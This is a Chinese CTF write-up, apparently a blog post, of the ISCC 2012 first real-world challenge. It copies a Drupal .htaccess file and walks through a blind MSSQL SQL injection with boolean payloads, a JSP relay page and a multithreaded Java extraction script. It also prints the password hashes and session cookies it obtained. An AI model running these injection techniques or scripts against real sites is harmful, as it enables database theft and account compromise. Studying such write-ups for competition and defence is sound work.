ISCC 2012 真实关第一题
来源:互联网 发布:海迈预算软件 编辑:程序博客网 时间:2024/05/16 01:36
第一天:
整个网站,没有什么思路,无从下手的感觉,拿wwwscan一顿狂扫,发现很多目录都是403,可能是做了IP限制,扫到一个叫做htaccess,
http://www.isclab.org/contest/.htaccess下下来发现是一些转跳的
规则,和一些防下载防列目录的规则,从中找到了服务器的架构 Apache/PHP/Drupal 百度了一下,也没有什么可利用的漏洞。
趁机学习了一下,htaccess的配制方法,先把扫到的文件内容粘上了。
教程在这http://hi.baidu.com/wojiubaibudu/item/4b3513c74a8fe47aced4f817
注释占了很多,一些简单的功能注释已经说的很明白了,主要看一下URL重定向的设置,这的功能比较强大。
规则是所有符合RewriteCond规则的URL都会被重定向到,RewriteRule的地址
正则表达式是个非常蛋疼的东西,可是很多时候会用到。
教程的话看这个http://manual.phpv.net/regular_expression.html
总结一下常用的几个符号
^ 匹配字符串开始$ 匹配字符串结束\w 字母下划线汉字\d 数字\b 单词的开始或结束. 任意一字符,除换行* 前一字符重复零到多次+ 前一字符重复一到多次{n} 重复n次
比如防盗链的功能可以这样实现,凡是HTTP_PEFERER(来源URL)与本站URL不配备,NC是忽略大小写。
或者HTTP_FEFERER为空的话,就执行RewriteRule把 .*.(jpe?g|gif|bmp|png)$ 这个正则表达式匹配到得字符串替换成
一个服务器上默认的图片,L代表着重定向语句的结束。
RewriteEngine OnRewriteCond %{HTTP_REFERER}!^http://(.+.)?mysite.com/ [NC]RewriteCond %{HTTP_REFERER}!^$RewriteRule .*.(jpe?g|gif|bmp|png)$ /images/nohotlink.jpg [L]
伪静态目录可以这样实现,这个伪静态非常有用
搜索引擎友好,用户友好,而且可以掩盖绝大数注入点扫描器的眼睛
规则是这样,他会把用户访问的静态页面目录捕捉到,比如^archiver/((fid|tid)-[0-9]+\.html)$,
然后重定向到动态页面,比如archiver/index.php?$1 $1是反向匹配,代表着正则表达式中第一个括号中的内容。
# 将 RewriteEngine 模式打开 RewriteEngine On # Rewrite 系统规则请勿修改 RewriteRule ^archiver/((fid|tid)-[0-9]+\.html)$ archiver/index.php?$1 RewriteRule ^forum-([0-9]+)-([0-9]+)\.html$ forumdisplay.php?fid=$1&page=$2 RewriteRule ^thread-([0-9]+)-([0-9]+)-([0-9]+)\.html$ viewthread.php?tid=$1&extra=page\%3D$3&page=$2 RewriteRule ^space-(username|uid)-(.+)\.html$ space.php?$1=$2 RewriteRule ^tag-(.+)\.html$ tag.php?name=$1
## Apache/PHP/Drupal settings:## Protect files and directories from prying eyes.<FilesMatch "\.(engine|inc|info|install|make|module|profile|test|po|sh|.*sql|theme|tpl(\.php)?|xtmpl|svn-base)$|^(code-style\.pl|Entries.*|Repository|Root|Tag|Template|all-wcprops|entries|format)$"> Order allow,deny</FilesMatch># Don't show directory listings for URLs which map to a directory.Options -Indexes# Follow symbolic links in this directory.Options +FollowSymLinks# Make Drupal handle any 404 errors.ErrorDocument 404 /index.php# Force simple error message for requests for non-existent favicon.ico.<Files favicon.ico> # There is no end quote below, for compatibility with Apache 1.3. ErrorDocument 404 "The requested file favicon.ico was not found.</Files># Set the default handler.DirectoryIndex index.php# Override PHP settings. More in sites/default/settings.php# but the following cannot be changed at runtime.# PHP 4, Apache 1.<IfModule mod_php4.c> php_value magic_quotes_gpc 0 php_value register_globals 0 php_value session.auto_start 0 php_value mbstring.http_input pass php_value mbstring.http_output pass php_value mbstring.encoding_translation 0</IfModule># PHP 4, Apache 2.<IfModule sapi_apache2.c> php_value magic_quotes_gpc 0 php_value register_globals 0 php_value session.auto_start 0 php_value mbstring.http_input pass php_value mbstring.http_output pass php_value mbstring.encoding_translation 0</IfModule># PHP 5, Apache 1 and 2.<IfModule mod_php5.c> php_value magic_quotes_gpc 0 php_value register_globals 0 php_value session.auto_start 0 php_value mbstring.http_input pass php_value mbstring.http_output pass php_value mbstring.encoding_translation 0</IfModule># Requires mod_expires to be enabled.<IfModule mod_expires.c> # Enable expirations. ExpiresActive On # Cache all files for 2 weeks after access (A). ExpiresDefault A1209600 <FilesMatch \.php$> # Do not allow PHP scripts to be cached unless they explicitly send cache # headers themselves. Otherwise all scripts would have to overwrite the # headers set by mod_expires if they want another caching behavior. This may # fail if an error occurs early in the bootstrap process, and it may cause # problems if a non-Drupal PHP file is installed in a subdirectory. ExpiresActive Off </FilesMatch></IfModule># Various rewrite rules.<IfModule mod_rewrite.c> RewriteEngine on # If your site can be accessed both with and without the 'www.' prefix, you # can use one of the following settings to redirect users to your preferred # URL, either WITH or WITHOUT the 'www.' prefix. Choose ONLY one option: # # To redirect all users to access the site WITH the 'www.' prefix, # (http://example.com/... will be redirected to http://www.example.com/...) # adapt and uncomment the following: # RewriteCond %{HTTP_HOST} ^example\.com$ [NC] # RewriteRule ^(.*)$ http://www.example.com/$1 [L,R=301] # # To redirect all users to access the site WITHOUT the 'www.' prefix, # (http://www.example.com/... will be redirected to http://example.com/...) # uncomment and adapt the following: # RewriteCond %{HTTP_HOST} ^www\.example\.com$ [NC] # RewriteRule ^(.*)$ http://example.com/$1 [L,R=301] # Modify the RewriteBase if you are using Drupal in a subdirectory or in a # VirtualDocumentRoot and the rewrite rules are not working properly. # For example if your site is at http://example.com/drupal uncomment and # modify the following line: # RewriteBase /drupal # # If your site is running in a VirtualDocumentRoot at http://example.com/, # uncomment the following line: RewriteBase / # Rewrite URLs of the form 'x' to the form 'index.php?q=x'. RewriteCond %{REQUEST_FILENAME} !-f RewriteCond %{REQUEST_FILENAME} !-d RewriteCond %{REQUEST_URI} !=/favicon.ico RewriteRule ^(.*)$ index.php?q=$1 [L,QSA]</IfModule># $Id: .htaccess,v 1.90.2.5 2010/02/02 07:25:22 dries Exp $
第二天:
漫无目的的搜寻注入点,在于Rank的页面的?page参数这里发现了网站为数不多的几个动态页面。
可是发现,参数经过了过滤,会截取到第一个不是数字的字符为止作为参数,尝试了各种绕过IDS的方法,均未果,蛋疼。
这里需要注意一下URL编码的问题,URL在Internet上传送的时候只支持ASCII码,由于URL中可能有一些ASCII之外的字符
和一些危险的字符,我们使用URL编码把这些字符转换成%XX这种形式。但是,这个转化大部分情况下是由浏览器完成的,
再通过编程语言模拟浏览器访问页面的时候要注意URL编码的问题。
这里有一个各种绕过IDS方法的帖子
http://www.yunsec.net/a/security/wlgf/2011/1017/9537.html
http://wenku.baidu.com/view/39d0dff3f90f76c661371a00.html
http://www.ixpub.net/home.php?mod=space&uid=12690065&do=blog&id=18615
http://blog.renren.com/share/249797970/2731285811
可用性尚未证实,先在这里留个坑。
第三天:
天降大雨,适于睡眠,一觉醒来已经中午了,玩了会地下城,各种被怪虐
第四天:
经高手指示,注入点存在于一个静态页面,果断找到。
http://www.isclab.org/contest/challenge/passlog/1
发现是一个无返错的MSSQL注入点
先测试一下系统表可不可以访问,发现所有的系统表都不能访问
and (select count(*) from sysobjects)>0 //当前数据库下and (select count(*) from master.dbo.sysdatabases)>0and (select count(*) from syscolumns)>0
先测试几个函数好不好用
and (select count(*) from users where substring(name,1,1)='w')>0 //substring ok and (select count(*) from users where ascii(' ')=32)>0 //ascii ok and (select count(*) from users where len(name)>0)>0 //len wrong and (select count(*) from users where ascii(substring(name,1,1))>0)>0 //ascii+substring ok
最后用来注入的语句是这样的
and (select count(*) from users where name='wyl091256' and ascii(substring(pass,1,1))>0)>0
果断用TOMCAt架设了一个中转注入页面。
<%@ page contentType="text/html; charset=UTF-8" pageEncoding="UTF-8"%> <%@ page import="java.io.InputStream"%><%@ page import="java.net.URL"%><%@ page import="java.net.HttpURLConnection"%><%@ page import="java.io.BufferedReader"%><%@ page import="java.io.InputStreamReader"%><%response.setContentType("text/html;charset=UTF-8");response.setStatus(HttpServletResponse.SC_MOVED_PERMANENTLY);response.setHeader("Pragma","No-Cache"); response.setHeader("Cache-Control","No-Cache"); response.setDateHeader("Expires", 0); String word="";word=(String)request.getParameter("page");out.println("http://www.isclab.org/contest/challenge/passlog/"+word);String cutrentString="";String totalString="";InputStream inputStream;URL url = new URL("http://www.isclab.org/contest/challenge/passlog/"+word);HttpURLConnection connection=(HttpURLConnection)url.openConnection();connection.setRequestProperty("Cookie","SESSa2a57b4294507a5753fc449b43b9af6e=d585bc79916fc5fc3f69ccc6fea661fb");connection.connect();inputStream=connection.getInputStream();BufferedReader bufferedReader=new BufferedReader(new InputStreamReader(inputStream));while((cutrentString=bufferedReader.readLine())!=null){totalString+=cutrentString;}out.println(totalString);%>
不过发现一个问题,就是对于没有错误返回的注入点,很多注入工具都不好使。
不过听说 sqlmap 这个工具很强大,python脚本写的,还没有试用,再在这里留个坑。
至此用比较熟的java写了一个程序,来通过注入点跑数据。
注意几点,要把URL转成URL编码,java应该提供了相应的函数,不过我直接硬编码了。
最好使用多线程,并且给HttpURLConnection设置,Timeout参数,在Timeout的时候重启线程。
取消掉缓存,为了保险吧。
及时关闭inputstream以及connection。
import java.io.BufferedReader;import java.io.InputStream;import java.io.InputStreamReader;import java.net.HttpURLConnection;import java.net.URL;public class injecter{private static String cutrentString;private static String KEY="admin";private static String[] Tables={"name","pass","mail","time"};private static String tableName = "users"; private static String columnName = "pass";private static String userName = "wyl091256";private static char[] columnValues = new char[33];private static class injecterThead extends Thread{private static int index;public injecterThead(int index){this.index=index;}private int midFinder(int index,int start,int end) throws Exception{int mid = (start+end)/2;//System.out.println("Finder:"+start+" "+end);if (start==end) return mid;if (start==mid){if (tryURLConnection(end,index))return start;else return end;}if (tryURLConnection(mid,index)) //符号是小于return midFinder(index,start,mid-1);elsereturn midFinder(index,mid,end);}private boolean check(String str){return (str.indexOf(KEY)!=-1);}private String injectionURL(int num,int index){return "%20and%20(select%20count(*)%20from%20"+ tableName + "%20where%20name='"+userName+"'" + "%20and%20ascii(substring("+columnName+","+index+",1))%3c"+num+")%3E0";}private boolean tryURLConnection(int num,int index) throws Exception{cutrentString="";InputStream inputStream;String strURL = "http://www.isclab.org/contest/challenge/passlog/1"+injectionURL(num,index);URL url = new URL(strURL);//System.out.println(strURL);HttpURLConnection connection=(HttpURLConnection)url.openConnection();connection.setRequestProperty("Pragma","No-Cache");connection.setRequestProperty("Expires","0");connection.setRequestProperty("Cache-Control","no-cache");connection.setRequestProperty("Cookie","SESSa2a57b4294507a5753fc449b43b9af6e=11207d61c69c44087266b34bc782808c");connection.setRequestProperty("accept", "textml,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8"); connection.setRequestProperty("Accept-Encoding","gzip, deflate");connection.setRequestProperty("Accept-Language","zh-cn,zh;q=0.8,en-us;q=0.5,en;q=0.3");connection.setRequestProperty("Connection","keep-alive");connection.setRequestProperty("Host","xscj.hit.edu.cn");connection.setRequestProperty("Referer","http://xscj.hit.edu.cn/hitjwgl/xs/cjcx/cx.asp");connection.setRequestProperty("User-Agent","Mozilla/5.0 (Windows NT 5.1; rv:11.0) Gecko/20100101 Firefox/11.0");connection.setConnectTimeout(3000);connection.setDoOutput(true);connection.setDoInput(true);connection.setUseCaches(false);connection.connect();inputStream=connection.getInputStream();BufferedReader bufferedReader=new BufferedReader(new InputStreamReader(inputStream,"utf-8"));while((cutrentString=bufferedReader.readLine())!=null){//System.out.println(cutrentString);if (check(cutrentString)){inputStream.close();connection.disconnect();//System.out.println("True");return true;}}inputStream.close();connection.disconnect();//System.out.println("False");return false;}private void runColumnValue() throws Exception{int index=1;String value="";while (true){char c=(char)midFinder(index,0,256);if (c==' ' || (int)c==0 || index==32) break;System.out.println(c);value+=c;index++;}System.out.println(index);}@Overridepublic void run (){try{columnValues[index]=(char)midFinder(index,0,256);System.out.println(index+":"+(int)columnValues[index]);}catch(Exception e){System.out.println("InitErroe:"+e.getMessage());injecterThead it = new injecterThead(index);it.run();this.stop();}}}public static void main(String args[]){for(int i=1;i<=32;i++){injecterThead it = new injecterThead(i);it.run();}}}
很快跑出了我自己的MD5密码和admin的MD5密码
wyl091256
97faf8f61ca07a06f7bb999737158d4c
admin
a9976616854716aa043537627d2f32f3
第五天:
艰苦的破解MD5之旅,很多复杂的密码都无法破解,不过简单的可以在在线网站上得到。
有一个叫做彩虹表的东西貌似很强大。不过因为有几百G没有下载,再次留个坑。
到这里破解第一关的蛋疼之旅就基本结束了。
- ISCC 2012 真实关第一题
- ISCC 2012 真实关第二题
- ISCC 2012 破解关第四题 我已经不蛋疼啦~
- ISCC 2012 内核关的一些蛋疼想法
- 2016 ISCC CTF 比赛 WEB类第一题
- ISCC某题题解
- 第一关
- 第一关
- iscc 2014 writeup(图片处理题)
- 【华为oj】第一关
- 地牢第一关(Python)
- hackthegame<第一关>
- 爬虫闯关 - 第一关
- 春秋争霸第一关
- 荒岛求生第一关
- Jsoup第一关
- 网络黑客攻防学习平台之基础关第一题
- 学习python pythonchallenge第一关
- ArcGIS Runtime SDK for Windows Phone 3.0正式版发布啦,赶快来体验!
- MongoDB基本管理命令
- Unable to resolve target 'android-7'
- cgi 上传文件(c 语言) 进度条显示
- java转换中文数字为阿拉伯数字
- ISCC 2012 真实关第一题
- 在Eclipse中配置Struts2第一个HelloWorld项目
- strings.xml中占位符使用
- JDOM入门实例:读取与创建xml文档
- ubuntu下安装mysql
- QT 推箱子小游戏编写
- Eclipse快捷键大全(转载)
- Android视频慢慢来1
- gridControl1 中添加checkbox 列